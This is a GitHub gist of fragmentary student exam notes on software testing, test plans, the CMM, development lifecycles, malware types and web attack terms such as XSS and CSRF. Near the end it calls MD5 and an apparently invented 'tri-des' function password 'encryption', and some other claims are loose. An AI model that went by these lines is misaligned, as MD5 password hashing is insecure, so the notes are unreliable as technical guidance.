Created
April 19, 2013 03:11
-
-
Save stevebosworth/5417845 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#SPECS, STANDARDS, POLICIES | |
##specifications | |
- major cause in producing bugs | |
- established by the customer/owner of the website | |
##standards | |
- set of guidelines to follow usually set by a body of professionals (w3c, ISO) | |
##poliicies | |
- developed by the organization to standardize their own products/materials | |
- could be set by you, your organization or the client | |
#TESTING | |
##Dynamic Testing | |
- running the basic functions of the site | |
- basic usability | |
##Static Testing | |
- Testing to see how it looks when not running | |
##Black Box | |
- Tester only sees the output and input. Does not have access to the code or what happens behind the scene | |
##White Box | |
- Tester has access to the code and views how certain output is produced | |
- code reviews or pair programming could be ways to white box test | |
#WAYS TO TEST | |
##Test to Pass | |
- tests ensure that minimal functionality is achieved. Does not push the software to it's limits. | |
- maybe a character missing in an input or a badly formed input to check validation | |
##Test to Fail | |
- Breaks it. | |
- Attempt anything and everything to see if it breaks. | |
- Good for front facing pages, | |
- Costly | |
#SECURITY ISSUES | |
- All security measures started with worms | |
##revealing error messages | |
- close off all debugging features | |
- close off connections if not needed | |
##ddos | |
- distributed denial of service attack. | |
- uses a botnet to flood a site or server with requests causing it to either slow down or crash | |
##xss (XSSI, CFSR, XSS) | |
###XXS | |
- Cross Site Scripting | |
- insertion of script into a page (usually javascript) to perform an unallowed operation | |
- usually done through the URL bar or a form on a page. | |
- need to strip out or escape html entities and non-alphanumeric characters inputs are not run on the server | |
- Problems that can arise from this, embedding content, embedding malicious code, access user sessions and impersonating users or servers. | |
- Same origin policy is sometimes referred to as the cross- domain security policy. | |
###CSFR(Cross site forgery request) | |
- forging form information from a suspected site for submission | |
- a concern for web applications that keep server-states or executes server side transactions | |
###XSSI (Cross site Script Inclusion) | |
- including a script from another domain to enable information sharing | |
- usually when using an API or trusting a script from another server | |
##sql injection | |
- | |
##phishing | |
#TYPES OF MALWARE | |
##Rootkits | |
- software which exposes root functionality to unauthorized users | |
##Adware | |
- software which displays unwanted ads | |
##Botnets | |
- distributed collection of computers controlled by an individual or group | |
##Spyware | |
- software which collects user information and send it home | |
##Clickbots | |
- Software which sits dormant on your computer until it is instructed by the owner to visit sites and perform 'clicks' (on ads and the like) | |
##TrojanHorses | |
- software which claims to do one thing but also installs other software (like a keylogger or spyware) without the users knowledge | |
##Keyloggers | |
- software installed on a computer, in a program, or on a website that covertly collects user keystrokes in an attempt to collect personal information | |
#ENCRYPTION | |
#4 MAIN REASONS WE BUILD A TEST PLAN | |
##proof of testing | |
- gives you something to show clients, coworkers as proof that something did or didn't work | |
##organization | |
- add structure to requirements and creates goals for tests and developers | |
- adds specific requirements for a feature or project to be considered successful | |
##tracking | |
- who is responsible for what? | |
- what works, what doesn't and when it did or didn't work | |
##repeatability | |
- allows you to confidently produce code that works now and in the future | |
- if something breaks you can easily backtrack through passes and fails to find likely cause (tied to tracking) | |
#WHAT IS A TEST PLAN | |
- used for communicating the purpose and goal of tests | |
- document the tests themselves | |
##what is recorded | |
- what was tested | |
- i.e. product, feature or specific code that was tested | |
- resources required for test | |
- test environment (software, hardware, browsers) | |
- when they were tested | |
- keep track of what version of code was tested as tests are repeated and pass or fail | |
- who confirmed the results of the test | |
- what were the results | |
#HOW TO BUILD SECURE SYSTEMS | |
- Prevent | |
- Detect | |
- Contain | |
- Recover | |
#CAPABILITY MATURITY MODEL | |
- Provides a measure the the maturity of a companies software development process | |
- How rigid or defined are your processes for testings, requirements | |
- 5 stages to CMM: | |
1. Initial - mom and pop shops | |
2. Repeatable | |
3. Defined | |
4. Managed | |
5. Optimizing - largest companies (google, nasa, ibm) | |
#ISO 9000 | |
- deals with quality management and quality assurance | |
- possible case study question | |
#Main Hacking methods | |
- know them | |
- 5 out of 9 | |
1. XSS | |
2. SQL Injection | |
3. Phishing | |
4. Pharming | |
5. | |
#Development Lifecycles | |
- agile, scrum, waterfall, extreme programming | |
- know the difference between agile and scrum or extreme programming | |
##WATERFALL | |
- traditional model for project management | |
- common for contstruction projects, going to the moon, building things | |
- First you plan, then you execute, then you have the final product | |
- not very flexible. | |
- once requirements are set, they cannot change | |
- failures and problems add up through the process and lead to spectacular failures (your bridge falls apart) | |
- terrible for software | |
##AGILE | |
- embraces an iterative process for constantly evolving products (software is never really 'done') | |
- you plan, design, execute, then start over in small steps to achieve a larger goal | |
- is really more of a philosophy or general approach to iterative software design rather than a set of rules or guidelines | |
###The Agile Manifesto reads, in its entirety, as follows: | |
-We are uncovering better ways of developing software by doing it and helping others do it. Through this work we have come to value: | |
-Individuals and interactions over processes and tools | |
-Working software over comprehensive documentation | |
-Customer collaboration over contract negotiation | |
-Responding to change over following a plan | |
- That is, while there is value in the items on the right, we value the items on the left more. | |
##SCRUM | |
- more practical approach to project management | |
- is a type of agile, could be considered an implementation of Agile | |
- more rigid set of rules (i.e. 15 minute standup meetings at the start of each day, concept of using 'sprints' to create a series of strictly timed micro development cycles, who is responsible for what in a 'sprint') | |
- has defined roles for management and developers and clients in the system | |
##EXTREME PROGRAMMING | |
- like scrum, is an implementation of agile | |
- emphasizes the role of the client in the process of development and includes them in all stages. | |
- decentralized - clients, managers, developers are equal partners in development | |
- promotes unit testing, code review, pair programming, and constant role switching to maintain quality and decentralized nature | |
#LEGAL STUFF | |
- 5 ways to protect yourself legally | |
##Due Diligence | |
#THINGS TO THINK ABOUT | |
##know the roles in the overall scheme in development | |
- developers | |
- owners | |
- users | |
##What hackers know | |
- more than computers | |
- social engineering | |
- break and enter | |
##Minimum Security requirments | |
- encryptions | |
- logins and passwords | |
- perform QA | |
- having security features does not mak for QA | |
##Project Planning | |
- theoretical stuff | |
- | |
#SOFTWARE TESTING DOES NOT GUARANTEE QUALITY | |
- just that it runs | |
#configuration testing, usability testing (User Acceptance Testing) Why Best? Why Hard? | |
#Version Control | |
- first 3 slides | |
- lifecycle of version control | |
Designing Tests | |
- | |
SECURITY | |
Firewalls | |
- | |
!php encryption! | |
$var = md5(...); | |
$pass = md5(...); | |
OR | |
$var = tri-des(...); | |
!.net encryption! | |
using microsoft.security | |
encryptMD5() | |
SSL encryption | |
- see diagram | |
- will be a question | |
Definition | |
explain | |
case studies | |
- situation i.e. company has to do ... | |
- response | |
- from a hackers perspective | |
how-to | |
- | |
explain the steps involved in the CMM | |
Explain 5 ways a developer can protect themselves legally | |
What would be the severity and priority in this situation | |
- user queries returning wrong information | |
- as a developer what would you look for | |
How-to | |
-ssl | |
-encryption | |
-implement a development lifecyle | |
what is a test plan, why do they use it | |
- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment